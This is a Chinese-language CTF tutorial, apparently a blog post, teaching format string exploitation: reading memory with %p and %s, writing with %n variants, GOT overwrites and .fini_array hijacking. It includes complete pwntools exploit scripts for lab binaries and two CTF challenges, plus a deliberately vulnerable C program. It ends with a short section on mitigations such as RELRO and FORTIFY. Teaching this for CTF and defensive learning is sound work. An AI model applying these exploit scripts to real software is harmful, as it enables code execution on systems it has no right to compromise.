格式化字符串漏洞及利用_萌新食用

前言

格式化字符串漏洞 具有 任意地址读,任意地址写。

printf

printf --一个参数:情况1

image.png

当参数 只有 1个字符串的话(含有%?),  //?  即 i, x, s 等等<br>第一个参数 作为 格式化字符串,而这个格式化字符串里含有解析 字符串的 %p ,它将第一个参数作为 格式化字符串,

第二个参数 作为 格式化字符串的参数表 中的第一个参数 即 %p 对应 栈中 0xffffd144 的内容,//它将栈中 0xffffd144 的内容 以带有0x 的16进制显示出来。(32位 程序传参方式 传到栈上,栈地址 0xffffd144 中的内容为 第二个参数)

image.png

printf --一个参数:情况2

image.png

当参数 只有 1个字符串的话(不含有%?),在Linux中会 被转化为puts(arg)    //? 即 i, x, s 等等

image.png

printf --两个参数:

image.png

当两个参数 时,第一个参数作为 格式化字符串,

第二个参数 作为 格式化字符串的参数表 中的第一个参数 即 %s 对应 “yangmutou”

image.png

printf --三个参数:

image.png

当三个参数 时,第一个参数作为 格式化字符串,

第二个参数 作为 格式化字符串的参数表 中的第一个参数   即 %s 对应 “yangmutou”

第三个参数 作为 格式化字符串的参数表 中的第二个参数   即 %d 对应   20

image.png

任意地址 读

而这个函数是有漏洞的我们简单 看下面我写的例子:

image.png

我们可以控制 printf 的参数。我们输入 “aaaa%p.%p.%p.%p.%p.%p.%p.%p.%p.%p”到 0xffffd11c 栈地址处

image.png

可以看到 我们输入的这一整个字符串 作为了  格式化字符串,

aaaa后面的第一个 %p 被 格式化字符串的参数表 中的第一个参数(0xffffd100+0x4*1中的内容) 解析成“0x + 16进制”0xffffd11c     然后替换掉

aaaa后面的第二个 %p 被 格式化字符串的参数表 中的第二个参数(0xffffd100+0x4*2中的内容) 解析成“0x + 16进制” 0x64            然后替换掉

aaaa后面的第二个 %p 被 格式化字符串的参数表 中的第三个参数(0xffffd100+0x4*3中的内容) 解析成“0x + 16进制” 0x5655561e  然后替换掉

具体可以 看下面的 gdb 截图:

image.png

此时的栈:

image.png

另外 我们可以通过这种 方法  得到 ,第 7 个 %p 被替换成  0x61616161,即我们输入的 字符串 存到了 偏移 为 7 的 位置。这里的偏移  可以理解为 上面 的 “格式化字符串的参数表 中的第 x 个参数”另外  我们可以通过输入 %offset$p   直接输出 偏移为 7 处的内容(“0x + 16进制”)  试下 输出结果:

image.png

我们可以观察下   栈地址 0xffffd11c+0x4*2 处中的地址是个   指向字符串的指针

image.png

我们可以输出结果:

%9$s

/home/yangmutou/桌面/fmt

总结:即格式化漏洞的任意地址 读 其实仅需要 通过 “%偏移$格式输出” 便可以了,利用方式  很简单。这里主要 就是 要特别 注意一点,这里的偏移 是指的格式化 字符串的第几个参数,而不是说是printf 函数的第几个参数呐,因为 本来 格式化字符串   就是 printf 函数的第一个参数。两者 有 相差 1 的数学等式 关系。

任意地址 写 

我们还看  上面我写的小例子。

image.png

因为 不存在栈溢出,但我们要 getshell又 需要将 返回地址 给覆盖成 backdoor 地址。即需要利用格式化字符串漏洞的  任意地址写。

首先:

bss_addr : 0804a028   //readelf -S fmt | grep bss  得到在格式化字符串 中 有一个 特殊的格式化控制符 “%n”,它可以将已经输出的字节个数写入到 指定的 的地址中一般使用方式:"\x28\xa0\x04\x08%7$n",就是 将 已经输出的字节个数 写入到 指定的地址0x0804a028 处(这里指定的地址处就是 偏移为7(格式化字符串的第7个参数) 的栈地址中的内容,即就是  我们写入的0x0804a024 指定地址)

payload 写成上面形式  理论上 是可以成功的,但我这次确失败了。于是就写脚本形式吧。

image.png

输入之前:

image.png

输入 之后 :

image.png

可以发现 4 被写入发 0x0804a024 中了   ,4即是p32(0x0804a024)的字节数。输出到屏幕上 的。

以上我们就算是演示下 任意写的 简单用法了。

而这题  我原本想的 是  将 backaddr 的地址写入 ret_addr,脚本如下:但失败了,因为想法  就是错的。

如果我们采用 下面exp 的方法  ,是向 ret_addr 所在栈地址中的 内容 作为指针 ,向这个 指针中 写入  0x80484b6 。而并不是 把 ret_addr 所在栈地址 作为指针,并不是向栈地址中写入 0x80484b6

image.png

所以 ,换思路:我们 将printf_got 指针指向的 地址  改为  system_plt

image.png

from pwn import *

p=process("./fmt")

elf=ELF("./fmt")

offset=7

printf_got=elf.got['printf']#0x0804a010

system_plt=elf.plt['system']#0x08048360

print "printf_got is "+hex(printf_got)

print "system_plt is "+hex(system_plt)

payload=p32(printf_got)+"%"+str(system_plt-4)+"c%7$n"# make printf_got -> system_plt

gdb.attach(p)

p.sendline(payload)

p.interactive()

可以看到  printf_got 指针指向的 地址  改为了  system_plt

所以,printf(&arg),就相当于 system(&arg)了,如果我们再发送 "/bin/sh\x00",作为arg 就能getshell了。但 程序只能运行一次。

为了学习。我们加上循环,重新编译。

//gcc -g -m32 -fno-stack-protector -no-pie -o fmt fmt.c    为了调试方便,关闭canary 和pie 保护

#include<stdio.h>

#include<stdlib.h>

#include<string.h>

#include<unistd.h>

int backdoor()

{

return system("/bin/sh\x00");

}

int main()

{

while(1)

    {

char buf[100];

memset(&buf,0,100);

        read(0, &buf,100);

printf(&buf);

    }

return 0;

}

exp:

from pwn import *

p=process("./fmt")

elf=ELF("./fmt")

offset=7

printf_got=elf.got['printf']#0x0804a010

system_plt=elf.plt['system']#0x08048360

print "printf_got is "+hex(printf_got)

print "system_plt is "+hex(system_plt)

payload=p32(printf_got)+"%"+str(system_plt-4)+"c%7$n"# make printf_got -> system_plt

gdb.attach(p)

p.sendline(payload)

p.sendline("/bin/sh\x00")

p.interactive()

成功 getshell!

image.png

%n系列

当这样构造payload  在比赛或者是 实际 漏洞利用时,往往会不会成功。因为一次行传输这么大量的字节 会导致网络卡顿或者中断连接。

我们再来了解下”%n“ 格式化字符的扩展(称不上 其实,就称为一个系列吧)

%n  一次性写入4个字节

%hn  一次性写入2个字节

%hhn  一次性写入1个字节

这个"%n"系列的 作用就是 向 指定的地址中写入 已经输出的字节个数。用 "%偏移$n"("%偏移$hn","%偏移$hhn")  用偏移控制 指定地址。

我们稍微改造下 上面的exp:

#coding:utf8

from pwn import *

p=process("./fmt")

elf=ELF("./fmt")

offset=7

printf_got=elf.got['printf']#0x0804a010

system_plt=elf.plt['system']#0x08048360

print "printf_got is "+hex(printf_got)

print "system_plt is "+hex(system_plt)

#思路:向 printf_got 中 写入 system_plt

# 我们把  printf_got 最低位字节 覆盖成 0x60  一字节 写入 %hhn

# 我们把  printf_got 最低位字节+1字节 覆盖成 0x83  一字节 写入 %hhn

# 我们把  printf_got 最低位字节+2字节 覆盖成 0x04  一字节 写入 %hhn

# 我们把  printf_got 最低位字节+3字节 覆盖成 0x08  一字节 写入 %hhn

payload=p32(printf_got)      #0x60          # 偏移  为 7

payload+=p32(printf_got+1)   #0x83          # 偏移  为 8

payload+=p32(printf_got+2)   #0x04          # 偏移  为 9

payload+=p32(printf_got+3)   #0x08          # 偏移  为 10

payload+="%"+str(0x60-0x4*4)+"c%7$hhn"        #0x60          # 偏移  为 7

payload+="%"+str(0x83-0x60)+"c%8$hhn"         #0x83          # 偏移  为 8

payload+="%"+str(0x104-0x83)+"c%9$hhn"        #0x04          # 偏移  为 9  #由于是hhn所以会被截断,只留后两位

payload+="%"+str(0x8-0x4)+"c%10$hhn"          #0x08          # 偏移  为 10

gdb.attach(p)

p.sendline(payload)

p.sendline("/bin/sh\x00")

p.interactive()

成功getshell!其实 有一点疑问的 明明  printf_got,system_plt 的地址 的搞两个字节 相同,但在这题中 如果不覆盖 会失败!

image.png

pwntools之 Fmtstr

在 pwntools 提供给了 我们一个 很方便的 类 Fmtstr,用于构造 格式化任意写 的payload官方文档可见于:

http://docs.pwntools.com/en/stable/fmtstr.html

最常用 功能:

fmtstr_payload(offset, {printf_got:system_plt})

即第一个参数 为 输入的payload 的偏移,第二个参数 为一个 {} 组合,“:”前面是要覆盖地址里的内容 被覆盖为":"后面的内容。所以这题就可以这样构造:

image.png

而上面 是 32 位程序,我们现在来学下 看下更加主流的 64 位程序  是如何的。

//gcc -g -fno-stack-protector -no-pie -o fmt fmt.c    为了调试方便,关闭canary 和pie 保护;  另外去掉 -m32 参数

#include<stdio.h>

#include<stdlib.h>

#include<string.h>

#include<unistd.h>

int backdoor()

{

return system("/bin/sh\x00");

}

int main()

{

while(1)

    {

char buf[100];

memset(&buf,0,100);

        read(0, &buf,100);

printf(&buf);

    }

return 0;

}

我门首先还是  查看 偏移:

aaaaaaaa%p.%p.%p.%p.%p.%p.%p.%p.%p.%p

gdb 调试:

image.png

发现,我们的payload 存放在  栈顶了,偏移难道是 0 吗,当然并不是。

但我们都知道 64 位程序 传参的时候是 从左到右 依次放入 寄存器:rdi,rsi,rdx,rcx,r8,r9 ,当参数大于等于 7 的时候 后面参数会依次 从右向左 放入栈中!

image.png

即 栈顶 存放的我们输入的payload 是作为了 printf 函数的 第7个参数,格式化字符串的第6个参数。偏移即为 6.我们可以简单证明下:

image.png

我们知道了偏移,也可以得到  printf_got,printf_plt  那么看看是否 64位 也可以 用Fmtstr 一把梭 getshell!exp:

image.png

发现 并不能 这样 构造  我们可以看下 payload(以dubug 查看)

image.png

在 \x20\x10\x60后面的 是64位程序地址的高位 “\x00”但 “\x00”又会 是 字符串的结束符,相当于 截断了 payload。使payload 失去作用。于是 我们可以 调整payload,将 地址 放在 payload 的最后。由于地址中带有\x00,所以这回就不能用%hhn分段写了,因此我们的payload构造如下

image.png

gdb 查看下 是否对齐 和printf_got所在偏移

image.png

可以发现错位了 1字节 偏移为8 我们修正 下 payload,

image.png

image.png

当我们程序只能运行 一次呢,我们要怎样 gadshell 呢。再无法 ROP的情况下,我们如何利用 格式化字符串 来使得程序重新 运行呢。这里有个 流程表,    

main函数作为程序入口,但编译成程序的时候入口其实是start代码段。(看下面图更利于理解)start代码段还会调用__libc_start_main来做一些初始化工作,最后调用main函数并在main函数结束后做一些处理。

在main函数前会调用.init段代码和.init_array段的函数数组中每一个函数指针。同样的,main函数结束后也会调用.fini段代码和.fini._arrary段的函数数组中的每一个函数指针。(以上两行内容  来自 网络)

image.png

所以 如果 程序 不存在循环,我们的思路一般是,把 printf_got 给改成 system_plt, 同时 把我们可以  将.fini.arrary 中的 第一个指针 给 覆盖成 start 地址,当 程序 结束后,调用  .fini.arrary的第一个指针,便将执行流 弄到 程序在开始处,即相当于重新 执行了一次程序,但  printf_got 已经 是 system_plt 了,我们 输入 "/bin/sh\x00"就可拿到 shell。

我看到 这里时,本试图自己写个小程序

image.png

正常 来想 我觉得  这样 是可以  getshell 的。

但因为 无法控制    .fini.arrary 所造内存的 RWX状态,没法 向  .fini.arrary 第一个指针里 写入  内容。 默认只可读。

image.png

但假设 它可写,没意外的话,以下 exp 是应该是 可以 getshell 的。

#coding:utf8

from pwn import *

context(arch="amd64",os='linux',log_level="debug")

p=process("./fmt_64")

elf=ELF("./fmt_64")

#offset=6

printf_got=elf.got['printf']

system_plt=elf.plt['system']

backdoor=0x4005c7

fini_array=0x600e18        #readelf -S fmt_64 | grep fini_array

'''

backdoor is 0x4005c7

fini_array is 0x600e18

'''

print "backdoor is "+hex(backdoor)

print "fini_array is "+hex(fini_array)

#pause()

payload = "a"+"%"+str(backdoor-1)+"c%8$lln"+p64(fini_array)

#gdb.attach(p,"b main")

p.sendline(payload)

p.recv()

p.interactive()

不假设了,还是看真题吧!

MMA CTF 2nd 2016-greeting

即 32位 的elf  文件,开启了 canary

$file greeting

ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-, for GNU/Linux 2.6.24, BuildID[sha1]=beb85611dbf6f1f3a943cecd99726e5e35065a63, not stripped

$checksec greeting

Arch:     i386-32-little

RELRO:    No RELRO

Stack:    Canary found

NX:       NX enabled

PIE:      No PIE (0x8048000)

拖入 ida:看下程序 流程:程序大概就是我们输入等于64 个字符 到v5中,然后 将”Nice to meet you, “+我们输入的64个字符+ “:)\n” 复制到s中!

image.png

解题思路:

为了程序重新运行,我们将.fini_array数组的第一个元素为start地址

因为当执行过start地址后,.fini_array数组的第一个元素将不再是start地址,所以我们在将程序重新执行后,我们需要将执行过程中的一个函数的got地址改成system的plt地址,然后第二次就直接输入/bin/sh\x00 拿shell了

测偏移:12首先 输入

aaaa%p..%p..%p..%p..%p..%p..%p..%p..%p..%p..%p..%p..%p..%p..%p..%p..

Hello, I'm nao!

Please tell me your name... aaaa%p..%p..%p..%p..%p..%p..%p..%p..%p..%p..%p..%p..%p..%p..%p..%p..%p..%p..%p..%p..%p..%p..%p..%p..%p..%p..%p..%p..%p..%p..%p..%p..

Nice to meet you, aaaa0x80487d0..0xffa5f54c..(nil)..(nil)..(nil)..(nil)..0x6563694e..0x206f7420..0x7465656d..0x756f7920..0x6161202c..0x70256161..0x70252e2e..0x70252e2e..0x70252e2e. :)

发现 0x70256161 6161 是我们 的输入的a!显然没有对齐,我们在aaaa前面再加2a,于是我们发送

aaaaaa%p..%p..%p..%p..%p..%p..%p..%p..%p..%p..%p..%p..%p..%p..%p..%p..

Hello, I'm nao!

Please tell me your name... aaaaaa%p..%p..%p..%p..%p..%p..%p..%p..%p..%p..%p..%p..%p..%p..%p..%p..

Nice to meet you, aaaaaa0x80487d0..0xffb9e0bc..(nil)..(nil)..(nil)..(nil)..0x6563694e..0x206f7420..0x7465656d..0x756f7920..0x6161202c..0x61616161..0x2e2e7025..0x2e2e7025..% :)#

发现是12偏移aaaaaa的后四个a 的偏移 是 12  对应于 下面exp 中payload 中的 p32(fini_array) 位置处

其中  exp 中  %hn  是以 两字节  写入。这里 之所以  payload 最开始 会 对 +18 感到 疑惑,其实 这是 因为   sprintf(&s, "Nice to meet you, %s :)\n", &v5);    //格式化字符串漏洞   首先 会输出  18 字节的 格式化字符串。

#coding:utf8

from pwn import *

context.log_level = 'debug'

conn=process('./greeting')

elf=ELF('./greeting')

fini_array=0x08049934         #readelf -S greeting

start=0x080484f0          #   ida  看的更方便嘛!

system_plt=0x8048490         

strlen_got=elf.got['strlen']

#print "strlen_got: "+hex(strlen_got)

#print "system_plt: "+hex(system_plt)

#print "fini_array: "+hex(fini_array)

#print "start: "+hex(start)

conn.recv()

payload='aa'+p32(fini_array)+p32(strlen_got+2)  #18+2+4+4

payload+=p32(strlen_got)+'%34000c%12$hn'        # +4+34000=0x84f0

payload+='%33556c%13$hn'                     #0x84f0+33556=0x10804 截断=0x0804

payload+='%31884c%14$hn'                     #0x10804+31884=0x18049 截断=0x8049

conn.sendline(payload)  #此时已 一次性将 fini_array->start   strlen_got->system_plt

conn.recv()                     #程序重新运行了,接受Please tell me your name...

conn.sendline('/bin/sh\x00')

conn.interactive()

成功 getshell:

image.png

然后 最后 我再 说下 这题吧!也是个  格式化字符串 任意写的 一个题型。

BJDCTF 2nd - Pwn_r2t4

这个程序 是 64位 并开启了  Canary保护的elf 文件,三天前比赛真题,还热乎着呢。

程序流程也很简单,输入什么 就输出 什么。当然这里是一个   很明显的 格式化字符串漏洞。并程序 只运行  一遍,且含有 后门函数。

int __cdecl main(int argc, const char **argv, const char **envp)

{

char buf; // [rsp+0h] [rbp-30h]                       

unsigned __int64 v5; // [rsp+28h] [rbp-8h]

  v5 = __readfsqword(0x28u);

  read(0, &buf, 0x38uLL);             //存在栈溢出 漏洞,但有canary 保护,虽然可通过任意地址写 可泄露canary,但程序只运行 一边。

printf(&buf, &buf);

return 0;

}

unsigned __int64 backdoor()

{

unsigned __int64 v0; // ST08_8

  v0 = __readfsqword(0x28u);

  system("cat flag");

return __readfsqword(0x28u) ^ v0;

}

通过上面代码中的注释可知,栈溢出的方法  不可取, 因为程序开启了Canary   当函数返回的时候  会比较canary的 值 是否发生变化,如果不一致,就触发 __stack_chk_fail 函数。且程序中 含有后门函数。我们可通过格式化字符串写  将backdoor_addr写入  __stack_chk_fail_got 中脚本如下:

#coding:utf8

from pwn import *

context(arch="amd64",os='linux',log_level="debug")

p=process("./r2t4")

p=remote("node3.buuoj.cn",26640)

elf=ELF("./r2t4")

offset=6

__stack_chk_fail=elf.got['__stack_chk_fail']

backdoor=0x400626

'''

__stack_chk_fail is 0x601018

backdoor is 0x400626

'''

print "__stack_chk_fail is "+hex(__stack_chk_fail)

print "backdoor is "+hex(backdoor)

#pause()

payload = "a"+"%"+str(backdoor-1)+"c%8$lln"+p64(__stack_chk_fail)#  0x30

payload+=(0x30-8-len(payload))*'a'

#gdb.attach(p,"b main")

p.sendline(payload)

#pause()

p.recv()

p.interactive()

成功 getshell

image.png

最后最后简单 说下

和格式化字符串漏洞相关的漏洞缓解机制

我们在checksec 程序的时候中 的RELRO 项:RELRO是重定位表只读(Relocation Read Only)的缩写,即plt 和got 表,

1、如果 这项的 内容 为  No RELRO的话  就代表  重定位表 不是仅可读的,我们在 漏洞利用的时候 可 优先考虑  修改某个函数的 got 表项,去达到 getshell 的目的。

2、如果  "其RELRO项为Partial RELRO 即该程序的重定位表项全部只读,无论是.got还是.got.plt都无法修改。改got表,程序不会报错,但是数据未被修改,

3、而如果 程序开启了Full RELRO保护之后,包括格式化字符串漏洞在内,试图通过漏洞劫持got表的行为都将会被阻止。

4、如果 是FORTIFY,这是一个由GCC实现的源码级别的保护机制,其功能是在编译的时候检查源码以避免潜在的缓冲区溢出等错误。简单地说,加了这个保护之后(编译时加上参数-D_FORTIFY_SOURCE=2)一些敏感函数如read, fgets, memcpy, printf等等可能导致漏洞出现的函数都会被替换成read_chk, fgets_chk, memcpy_chk,printf_chk等。这些带了chk的函数会检查读取/复制的字节长度是否超过缓冲区长度,通过检查·诸如%n之类的字符串位置是否位于可能被用户修改的可写地址,避免了格式化字符串跳过某些参数(如直接%7$x)等方式来避免漏洞出现。开启了FORTIFY保护的程序会被checksec检出,此外,在反汇编时直接查看got表也会发现chk函数的存在

其实 ,不得说下 我对最后一个 FORTIFY ,还没怎么接触到。经验太少!

格式化(字符串)溢出实验(通过本实验,理解格式化字符串漏洞,并对其进行利用)


本文作者:dingjiacan@antvsion.com

本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/162443.html

Tags:
评论  (0)
快来写下你的想法吧!

dingjiacan@antvsion.com

文章数:342 积分: 877

蚁景网安实验室(www.yijinglab.com)网络安全靶场练习平台,涉及CTF赛前指导、职业技能训练、网安专项技能提升等。

安全问答社区

安全问答社区

脉搏官方公众号

脉搏公众号